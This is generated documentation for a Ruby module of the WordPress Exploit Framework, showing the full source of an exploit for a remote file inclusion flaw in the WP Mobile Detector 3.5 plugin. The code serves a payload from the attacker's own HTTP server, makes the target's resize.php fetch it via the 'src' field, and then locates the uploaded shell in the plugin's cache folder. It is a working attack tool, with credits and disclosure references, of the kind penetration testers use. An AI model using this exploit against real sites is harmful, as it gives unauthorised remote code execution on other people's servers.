class Wpxf::Exploit::WpMobileDetectorRfiShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 8
def initialize
  super

  update_info(
    name: 'WP Mobile Detector RFI Shell Upload',
    desc: 'The WP Mobile Detector plugin, in version 3.5, '\
          'allows for remote file inclusion and remote code execution via '\
          'the resize.php script. This exploit only works when the PHP '\
          'option "allow_url_fopen" is enabled (disabled by default in most cases).',
    author: [
      'White Fir Design', # Vulnerability disclosure
      'rastating'         # WPXF module
    ],
    references: [
      ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'],
      ['WPVDB', '8505']
    ],
    date: 'May 31 2016'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The external address of this machine',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Public Instance Methods

before_upload() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 81
def before_upload
  start_http_server(true)
  true
end
check() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 47
def check
  check_plugin_version_from_readme('wp-mobile-detector', '3.6', '3.5')
end
cleanup() click to toggle source
Calls superclass method Wpxf::Module#cleanup
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 86
def cleanup
  stop_http_server
  super
end
on_http_request(path, params, headers) click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 63
def on_http_request(path, params, headers)
  payload.encoded
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 71
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_field('src', rfi_url)
  builder
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 43
def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-mobile-detector')
end
rfi_host() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 51
def rfi_host
  normalized_option_value('rfi_host')
end
rfi_path() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 55
def rfi_path
  normalized_option_value('rfi_path')
end
rfi_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 59
def rfi_url
  "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}"
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 77
def uploaded_payload_location
  normalize_uri(plugin_url, 'cache', payload_name)
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 67
def uploader_url
  normalize_uri(plugin_url, 'resize.php')
end